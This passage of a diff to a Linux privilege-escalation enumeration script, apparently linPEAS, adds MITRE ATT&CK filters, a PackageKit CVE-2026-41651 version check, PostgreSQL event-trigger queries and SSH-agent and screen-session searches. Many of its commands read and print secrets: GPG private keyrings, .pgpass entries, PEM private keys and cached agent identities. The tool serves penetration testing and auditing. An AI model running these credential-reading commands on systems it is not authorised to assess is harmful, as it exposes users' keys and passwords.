]; then if [ "$DEBUG" ]; then echo_not_found "*.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.asc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.asc"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.asc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.asc$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"secring\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "secring.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "secring\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,secring\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"pubring\.kbx$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pubring.kbx"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "pubring\.kbx$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pubring\.kbx$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"trustdb\.gpg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "trustdb.gpg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "trustdb\.gpg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,trustdb\.gpg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"gpg-agent\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "gpg-agent.conf"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "gpg-agent\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,gpg-agent\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"secret\.asc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "secret.asc"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "secret\.asc$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,secret\.asc$,${SED_RED},"; done; echo ""; if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"private-keys-v1\.d/.*\.key$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "private-keys-v1.d/*.key"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "private-keys-v1\.d/.*\.key$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,private-keys-v1\.d/.*\.key$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; if ! [ "`echo \"$PSTORAGE_PGP_GPG\" | grep -E \"\.gnupg$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.gnupg"; fi; fi; printf "%s" "$PSTORAGE_PGP_GPG" | grep -E "\.gnupg$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.gnupg$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$"; done; echo ""; fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then print_2title "Analyzing PHP Sessions Files (limit 70)" ls /var/lib/php/sessions 2>/dev/null || echo_not_found /var/lib/php/sessions @@ -7369,20 +9646,79 @@ if [ "$PSTORAGE_PHP_SESSIONS" ] || [ "$DEBUG" ]; then fi +fi + +if check_mitre_filter "T1068"; then +print_2title "Checking for PackageKit Pack2TheRoot (CVE-2026-41651)" "T1068" +print_info "https://github.security.telekom.com/2026/04/pack2theroot-cve-2026-41651.html" +pk_version="" +if command -v dpkg >/dev/null 2>&1; then + pk_version="$(dpkg -l 2>/dev/null | grep -iE '^ii\s+packagekit\s' | awk '{print $3}' | sed -E 's/^[0-9]+://; s/[-+~].*$//' | head -n1)" +fi +if [ -z "$pk_version" ] && command -v rpm >/dev/null 2>&1; then + pk_version="$(rpm -qa 2>/dev/null | grep -iE '^PackageKit-[0-9]' | head -n1 | sed -E 's/^[Pp]ackage[Kk]it-([0-9.]+)-.*/\1/')" +fi +if [ -z "$pk_version" ]; then + echo_not_found "PackageKit" +else + echo "PackageKit version detected: $pk_version" + # Vulnerable range: >= 1.0.2 and <= 1.3.4 + pk_min_vuln="1.0.2" + pk_max_vuln="1.3.4" + pk_lower="$(printf '%s\n%s\n' "$pk_min_vuln" "$pk_version" | sort -V | head -n1)" + pk_higher="$(printf '%s\n%s\n' "$pk_version" "$pk_max_vuln" | sort -V | tail -n1)" + if [ "$pk_lower" = "$pk_min_vuln" ] && [ "$pk_higher" = "$pk_max_vuln" ]; then + echo "Vulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit $pk_version is in the vulnerable range >=1.0.2 <=1.3.4" | sed -${E} "s,.*,${SED_RED_YELLOW}," + # Daemon reachability check (loaded via systemd or activatable via D-Bus) + echo "" + print_3title "PackageKit daemon reachability" + if command -v systemctl >/dev/null 2>&1 && systemctl status packagekit >/dev/null 2>&1; then + echo "PackageKit service is loaded/running - exploitation likely possible" | sed -${E} "s,.*,${SED_RED}," + elif command -v pkcon >/dev/null 2>&1 || command -v pkmon >/dev/null 2>&1; then + echo "pkcon/pkmon present - daemon can be activated on demand via D-Bus" | sed -${E} "s,.*,${SED_RED}," + else + echo "PackageKit daemon does not appear to be reachable from this session" | sed -${E} "s,.*,${SED_GREEN}," + fi + # Indicator of compromise: emitted_finished assertion failures + echo "" + print_3title "IOC: emitted_finished assertion failures" + if command -v journalctl >/dev/null 2>&1; then + pk_ioc_count="$(journalctl --no-pager -u packagekit 2>/dev/null | grep -c emitted_finished)" + if [ "${pk_ioc_count:-0}" -gt 0 ] 2>/dev/null; then + echo "Found ${pk_ioc_count} 'emitted_finished' crashes in PackageKit logs - possible prior exploitation" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo "No emitted_finished assertion failures found in PackageKit logs" + fi + else + echo "journalctl not available - cannot check IOC" + fi + else + echo "PackageKit $pk_version is not in the vulnerable range for CVE-2026-41651" | sed -${E} "s,.*,${SED_GREEN}," + fi +fi +echo "" + +fi + +if check_mitre_filter "T1556.003"; then pamdpass=$(grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#") if [ "$pamdpass" ] || [ "$DEBUG" ]; then - print_2title "Passwords inside pam.d" + print_2title "Passwords inside pam.d" "T1556.003" grep -Ri "passwd" ${ROOT_FOLDER}etc/pam.d/ 2>/dev/null | grep -v ":#" | sed "s,passwd,${SED_RED}," echo "" fi +fi + +if check_mitre_filter "T1552.001"; then if [ "$PSTORAGE_POSTGRESQL" ] || [ "$DEBUG" ]; then print_2title "Analyzing PostgreSQL Files (limit 70)" echo "Version: $(warn_exec psql -V 2>/dev/null)" if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin.*\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin*.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin.*\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin.*\.db$,${SED_RED},"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pg_hba\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pg_hba.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pg_hba\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pg_hba\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust|peer,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"postgresql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "postgresql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "postgresql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,postgresql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; - if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgsql\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgsql.conf"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgsql\.conf$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgsql\.conf$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "\W+\#|^#" | sed -${E} "s,auth|password|md5|user=|pass=|trust|peer,${SED_RED},g"; done; echo ""; + if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"\.pgpass$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".pgpass"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "\.pgpass$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pgpass$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -Ev "^#" | sed -${E} "s,.*,${SED_RED},g"; done; echo ""; if ! [ "`echo \"$PSTORAGE_POSTGRESQL\" | grep -E \"pgadmin4\.db$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pgadmin4.db"; fi; fi; printf "%s" "$PSTORAGE_POSTGRESQL" | grep -E "pgadmin4\.db$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,pgadmin4\.db$,${SED_RED},"; done; echo ""; fi @@ -7407,10 +9743,70 @@ if [ "$TIMEOUT" ] && [ "$(command -v psql || echo -n '')" ] || [ "$DEBUG" ]; the echo "" fi +fi + +if check_mitre_filter "T1505.001"; then +if [ "$DEBUG" ] || { [ "$TIMEOUT" ] && [ "$(command -v psql 2>/dev/null || echo -n '')" ]; }; then + print_2title "PostgreSQL event trigger ownership & postgres_fdw hooks" "T1505.001" + print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#postgresql-event-triggers" + psql_bin="$(command -v psql 2>/dev/null || echo -n '')" + if [ "$TIMEOUT" ] && [ "$psql_bin" ]; then + psql_evt_output="$($TIMEOUT 5 "$psql_bin" -w -X -q -A -t -d postgres -c "WITH evt AS ( SELECT e.evtname, e.evtenabled, pg_get_userbyid(e.evtowner) AS trig_owner, tr.rolsuper AS trig_owner_super, n.nspname || '.' || p.proname AS function_name, pg_get_userbyid(p.proowner) AS func_owner, fr.rolsuper AS func_owner_super FROM pg_event_trigger e JOIN pg_proc p ON e.evtfoid = p.oid JOIN pg_namespace n ON p.pronamespace = n.oid LEFT JOIN pg_roles tr ON tr.oid = e.evtowner LEFT JOIN pg_roles fr ON fr.oid = p.proowner ) SELECT evtname || '|' || evtenabled || '|' || COALESCE(trig_owner,'?') || '|' || COALESCE(CASE WHEN trig_owner_super THEN 'yes' ELSE 'no' END,'unknown') || '|' || function_name || '|' || COALESCE(func_owner,'?') || '|' || COALESCE(CASE WHEN func_owner_super THEN 'yes' ELSE 'no' END,'unknown') FROM evt WHERE COALESCE(trig_owner_super,false) = false OR COALESCE(func_owner_super,false) = false;" 2>&1)" + psql_evt_status=$? + if [ $psql_evt_status -eq 0 ]; then + if [ "$psql_evt_output" ]; then + echo "Non-superuser-owned event triggers were found (trigger|enabled?|owner|owner_is_super|function|function_owner|fn_owner_is_super):" | sed -${E} "s,.*,${SED_RED}," + printf "%s\n" "$psql_evt_output" | while IFS='|' read evtname enabled owner owner_is_super func func_owner func_owner_is_super; do + case "$enabled" in + O) enabled="enabled" ;; + D) enabled="disabled" ;; + *) enabled="status_$enabled" ;; + esac + echo " - $evtname ($enabled) uses $func owned by $func_owner (superuser:$func_owner_is_super); trigger owner: $owner (superuser:$owner_is_super)" | sed -${E} "s,superuser:no,${SED_RED},g" + done + else + echo "No event triggers owned by non-superusers were returned." | sed -${E} "s,.*,${SED_GREEN}," + fi + else + psql_evt_err_line=$(printf '%s\n' "$psql_evt_output" | head -n1) + echo "Could not query pg_event_trigger (psql exit $psql_evt_status): $psql_evt_err_line" | sed -${E} "s,.*,${SED_YELLOW}," + fi + else + if ! [ "$TIMEOUT" ]; then + echo_not_found "timeout" + fi + if ! [ "$psql_bin" ]; then + echo_not_found "psql" + fi + fi + postgres_fdw_dirs="/etc/postgresql /var/lib/postgresql /var/lib/postgres /usr/lib/postgresql /usr/local/lib/postgresql /opt/supabase /opt/postgres /srv/postgres" + postgres_fdw_hits="" + for d in $postgres_fdw_dirs; do + if [ -d "$d" ]; then + old_ifs="$IFS" + IFS="\n" + for f in $(find "$d" -maxdepth 5 -type f \( -name '*postgres_fdw*.sql' -o -name '*postgres_fdw*.psql' -o -name 'after-create.sql' \) 2>/dev/null); do + if [ -f "$f" ] && grep -qiE "alter[[:space:]]+role[[:space:]]+postgres[[:space:]]+superuser" "$f" 2>/dev/null; then + postgres_fdw_hits="$postgres_fdw_hits\n$f" + fi + done + IFS="$old_ifs" + fi + done + if [ "$postgres_fdw_hits" ]; then + echo "Detected postgres_fdw custom scripts granting postgres SUPERUSER (check for SupaPwn-style window):" | sed -${E} "s,.*,${SED_RED}," + printf "%s\n" "$postgres_fdw_hits" | sed "s,^, - ," + fi +fi +echo "" + +fi + +if check_mitre_filter "T1613,T1611"; then if ! [ "$SEARCH_IN_FOLDER" ]; then runc=$(command -v runc || echo -n '') if [ "$runc" ] || [ "$DEBUG" ]; then - print_2title "Checking if runc is available" + print_2title "Checking if runc is available" "T1613,T1611" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#runc--privilege-escalation" if [ "$runc" ]; then echo "runc was found in $runc, you may be able to escalate privileges with it" | sed -${E} "s,.*,${SED_RED}," @@ -7419,8 +9815,11 @@ if ! [ "$SEARCH_IN_FOLDER" ]; then fi fi +fi + +if check_mitre_filter "T1556"; then if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ "$DEBUG" ] ; then - print_2title "S/Key authentication" + print_2title "S/Key authentication" "T1556" printf "System supports$RED S/Key$NC authentication\n" if ! [ -d /etc/skey/ ]; then echo "${GREEN}S/Key authentication enabled, but has not been initialized" @@ -7433,8 +9832,11 @@ if (grep auth= /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q skey) || [ " echo "" fi -if ([ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then - print_2title "Searching screen sessions" +fi + +if check_mitre_filter "T1563"; then +if (command -v screen >/dev/null 2>&1 || [ -d "/run/screen" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_FOLDER" ]; then + print_2title "Searching screen sessions" "T1563" print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#open-shell-sessions" screensess=$(screen -ls 2>/dev/null) screensess2=$(find /run/screen -type d -path "/run/screen/S-*" 2>/dev/null) @@ -7443,12 +9845,25 @@ if ([ "$screensess" ] || [ "$screensess2" ] || [ "$DEBUG" ]) && ! [ "$SEARCH_IN_ find /run/screen -type s -path "/run/screen/S-*" -not -user $USER '(' '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null | while read f; do echo "Other user screen socket is writable: $f" | sed "s,$f,${SED_RED_YELLOW}," done + if [ -r "/etc/passwd" ]; then + print_3title "Checking other users screen sessions" "T1563" + cut -d: -f1,7 /etc/passwd 2>/dev/null | grep "sh$" | cut -d: -f1 | grep -v "^$USER$" | while read u; do + uscreen=$(screen -ls "${u}/" 2>/dev/null | grep -v "No Sockets found" | grep -v "^$") + if [ "$uscreen" ]; then + echo "User $u screen sessions:" + printf "%s\n" "$uscreen" | sed -${E} "s,.*,${SED_RED}," + fi + done + fi echo "" fi +fi + +if check_mitre_filter "T1552.001"; then SPLUNK_BIN="$(command -v splunk 2>/dev/null || echo -n '')" if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then - print_2title "Searching uncommon passwd files (splunk)" + print_2title "Searching uncommon passwd files (splunk)" "T1552.001" if [ "$SPLUNK_BIN" ]; then echo "splunk binary was found installed on $SPLUNK_BIN" | sed "s,.*,${SED_RED},"; fi printf "%s\n" "$PSTORAGE_SPLUNK" | grep -v ".htpasswd" | sort | uniq | while read f; do if [ -f "$f" ] && ! [ -x "$f" ]; then @@ -7459,18 +9874,27 @@ if [ "$PSTORAGE_SPLUNK" ] || [ "$SPLUNK_BIN" ] || [ "$DEBUG" ]; then echo "" fi -print_2title "Searching ssl/ssh files" +fi + +if check_mitre_filter "T1552.004,T1021.004"; then +print_2title "Searching ssl/ssh files" "T1552.004,T1021.004" if [ "$PSTORAGE_CERTSB4" ]; then certsb4_grep=$(grep -L "\"\|'\|(" $PSTORAGE_CERTSB4 2>/dev/null); fi if ! [ "$SEARCH_IN_FOLDER" ]; then sshconfig="$(ls /etc/ssh/ssh_config 2>/dev/null)" hostsdenied="$(ls /etc/hosts.denied 2>/dev/null)" hostsallow="$(ls /etc/hosts.allow 2>/dev/null)" - writable_agents=$(find /tmp /etc /home -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null) + agent_sockets=$(find /run/user /tmp -type s \( -path "/run/user/*/ssh-*/agent.*" -o -name "ssh-agent.sock" -o -path "/tmp/ssh-*" \) 2>/dev/null) + writable_agents=$(find /tmp /etc /home /run/user \ + \( -type s -a \( -name "agent.*" -o -name "ssh-agent.sock" -o -path "*/ssh-*/agent.*" -o -name "*gpg-agent*" \) \ + -a \( \( -user "$USER" \) -o \( -perm -o=w \) -o \( -perm -g=w -a \( $wgroups \) \) \) \) 2>/dev/null) else sshconfig="$(ls ${ROOT_FOLDER}etc/ssh/ssh_config 2>/dev/null)" hostsdenied="$(ls ${ROOT_FOLDER}etc/hosts.denied 2>/dev/null)" hostsallow="$(ls ${ROOT_FOLDER}etc/hosts.allow 2>/dev/null)" - writable_agents=$(find ${ROOT_FOLDER} -type s -name "agent.*" -or -name "*gpg-agent*" '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null) + agent_sockets=$(find "${ROOT_FOLDER}"tmp "${ROOT_FOLDER}"run -type s \( -name "agent.*" -o -name "ssh-agent.sock" \) 2>/dev/null) + writable_agents=$(find "${ROOT_FOLDER}" \ + \( -type s -a \( -name "agent.*" -o -name "ssh-agent.sock" -o -path "*/ssh-*/agent.*" -o -name "*gpg-agent*" \) \ + -a \( \( -user "$USER" \) -o \( -perm -o=w \) -o \( -perm -g=w -a \( $wgroups \) \) \) \) 2>/dev/null) fi if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then print_2title "Analyzing SSH Files (limit 70)" @@ -7482,20 +9906,20 @@ if [ "$PSTORAGE_SSH" ] || [ "$DEBUG" ]; then if ! [ "`echo \"$PSTORAGE_SSH\" | grep -E \"\.pub$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "*.pub"; fi; fi; printf "%s" "$PSTORAGE_SSH" | grep -E "\.pub$" | while read f; do ls -ld "$f" 2>/dev/null | sed -${E} "s,\.pub$,${SED_RED},"; cat "$f" 2>/dev/null | grep -IEv "^$" | grep -E "command=.*" | sed -${E} "s,command=.*,${SED_RED},g"; done; echo ""; fi -grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFiles" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," +grep "PermitRootLogin \|ChallengeResponseAuthentication \|PasswordAuthentication \|UsePAM \|Port\|PermitEmptyPasswords\|PubkeyAuthentication\|ListenAddress\|ForwardAgent\|AllowAgentForwarding\|AuthorizedKeysFile" /etc/ssh/sshd_config 2>/dev/null | grep -v "#" | sed -${E} "s,PermitRootLogin.*es|PermitEmptyPasswords.*es|ChallengeResponseAuthentication.*es|FordwardAgent.*es,${SED_RED}," if ! [ "$SEARCH_IN_FOLDER" ]; then if [ "$TIMEOUT" ]; then - privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) - privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOMESEARCH 2>/dev/null) - privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /root 2>/dev/null) - privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /mnt 2>/dev/null) + privatekeyfilesetc=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /etc 2>/dev/null) + privatekeyfileshome=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' $HOMESEARCH 2>/dev/null) + privatekeyfilesroot=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /root 2>/dev/null) + privatekeyfilesmnt=$(timeout 40 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /mnt 2>/dev/null) else - privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout - privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' $HOME/.ssh 2>/dev/null) + privatekeyfilesetc=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' /etc 2>/dev/null) #If there is tons of files linpeas gets frozen here without a timeout + privatekeyfileshome=$(grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' $HOME/.ssh 2>/dev/null) fi else # If $SEARCH_IN_FOLDER lets just search for private keys in the whole firmware - privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY.*\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null) + privatekeyfilesetc=$(timeout 120 grep -rl '\-\-\-\-\-BEGIN .* PRIVATE KEY\-\-\-\-\-' "$ROOT_FOLDER" 2>/dev/null) fi if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfilesroot" ] || [ "$privatekeyfilesmnt" ] ; then echo "" @@ -7507,48 +9931,53 @@ if [ "$privatekeyfilesetc" ] || [ "$privatekeyfileshome" ] || [ "$privatekeyfile echo "" fi if [ "$certsb4_grep" ] || [ "$PSTORAGE_CERTSBIN" ]; then - print_3title "Some certificates were found (out limited):" + print_3title "Some certificates were found (out limited):" "T1552.004,T1021.004" printf "$certsb4_grep\n" | head -n 20 - printf "$$PSTORAGE_CERTSBIN\n" | head -n 20 + printf "$PSTORAGE_CERTSBIN\n" | head -n 20 echo "" fi if [ "$PSTORAGE_CERTSCLIENT" ]; then - print_3title "Some client certificates were found:" + print_3title "Some client certificates were found:" "T1552.004,T1021.004" printf "$PSTORAGE_CERTSCLIENT\n" echo "" fi if [ "$PSTORAGE_SSH_AGENTS" ]; then - print_3title "Some SSH Agent files were found:" + print_3title "Some SSH Agent files were found:" "T1552.004,T1021.004" printf "$PSTORAGE_SSH_AGENTS\n" echo "" fi +if [ "$agent_sockets" ]; then + print_3title "Potential SSH agent sockets were found:" "T1552.004,T1021.004" + printf "%s\n" "$agent_sockets" | sed -${E} "s,.*,${SED_RED}," + echo "" +fi if ssh-add -l 2>/dev/null | grep -qv 'no identities'; then - print_3title "Listing SSH Agents" + print_3title "Listing SSH Agents" "T1552.004,T1021.004" ssh-add -l echo "" fi if gpg-connect-agent "keyinfo --list" /bye 2>/dev/null | grep "D - - 1"; then - print_3title "Listing gpg keys cached in gpg-agent" + print_3title "Listing gpg keys cached in gpg-agent" "T1552.004,T1021.004" gpg-connect-agent "keyinfo --list" /bye echo "" fi if [ "$writable_agents" ]; then - print_3title "Writable ssh and gpg agents" + print_3title "Writable ssh and gpg agents" "T1552.004,T1021.004" printf "%s\n" "$writable_agents" fi if [ "$PSTORAGE_SSH_CONFIG" ]; then - print_3title "Some home ssh config file was found" + print_3title "Some home ssh config file was found" "T1552.004,T1021.004" printf "%s\n" "$PSTORAGE_SSH_CONFIG" | while read f; do ls "$f" | sed -${E} "s,$f,${SED_RED},"; cat "$f" 2>/dev/null | grep -Iv "^$" | grep -v "^#" | sed -${E} "s,User|ProxyCommand,${SED_RED},"; done echo "" fi if [ "$hostsdenied" ]; then - print_3title "/etc/hosts.denied file found, read the rules:" + print_3title "/etc/hosts.denied file found, read the rules:" "T1552.004,T1021.004" printf "$hostsdenied\n" cat " ${ROOT_FOLDER}etc/hosts.denied" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_GREEN}," echo "" fi if [ "$hostsallow" ]; then - print_3title "/etc/hosts.allow file found, trying to read the rules:" + print_3title "/etc/hosts.allow file found, trying to read the rules:" "T1552.004,T1021.004" printf "$hostsallow\n" cat " ${ROOT_FOLDER}etc/hosts.allow" 2>/dev/null | grep -v "#" | grep -Iv "^$" | sed -${E} "s,.*,${SED_RED}," echo "" @@ -7560,6 +9989,9 @@ if [ "$sshconfig" ]; then fi echo "" +fi + +if check_mitre_filter "T1563"; then tmuxdefsess=$(tmux ls 2>/dev/null) tmuxnondefsess=$(ps auxwww | grep "tmux " | grep -v grep) tmuxsess2=$(find /tmp -type d -path "/tmp/tmux-*" 2>/dev/null) @@ -7574,8 +10006,11 @@ if ([ "$tmuxdefsess" ] || [ "$tmuxnondefsess" ] || [ "$tmuxsess2" ] || [ "$DEBUG echo "" fi +fi + +if check_mitre_filter "T1552.004"; then if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then - print_2title "Searching Vault-ssh files" + print_2title "Searching Vault-ssh files" "T1552.004" printf "$PSTORAGE_VAULT_SSH_HELPER\n" printf "%s\n" "$PSTORAGE_VAULT_SSH_HELPER" | while read f; do cat "$f" 2>/dev/null; vault-ssh-helper -verify-only -config "$f" 2>/dev/null; done echo "" @@ -7584,8 +10019,11 @@ if [ "$PSTORAGE_VAULT_SSH_HELPER" ] || [ "$DEBUG" ]; then fi echo "" +fi + +if check_mitre_filter "T1556"; then if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) || [ "$DEBUG" ]; then - print_2title "YubiKey authentication" + print_2title "YubiKey authentication" "T1556" printf "System supports$RED YubiKey authentication\n" if ! [ "$IAMROOT" ] && [ -w /var/db/yubikey/ ]; then echo "${RED}/var/db/yubikey/ is writable by you" @@ -7596,6 +10034,9 @@ if (grep "auth=" /etc/login.conf 2>/dev/null | grep -v "^#" | grep -q yubikey) | echo "" fi +fi + +fi fi echo '' @@ -7603,8 +10044,10 @@ echo '' if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi if echo $CHECKS | grep -q interesting_perms_files; then +if check_mitre_filter "T1552.001,T1083,T1574.009,T1574.010,T1548.001,T1222,T1574.006,T1546.004,T1543.002,T1518.001"; then print_title "Files with Interesting Permissions" -print_2title "SUID - Check easy privesc, exploits and write perms" +if check_mitre_filter "T1548.001"; then +print_2title "SUID - Check easy privesc, exploits and write perms" "T1548.001" print_info 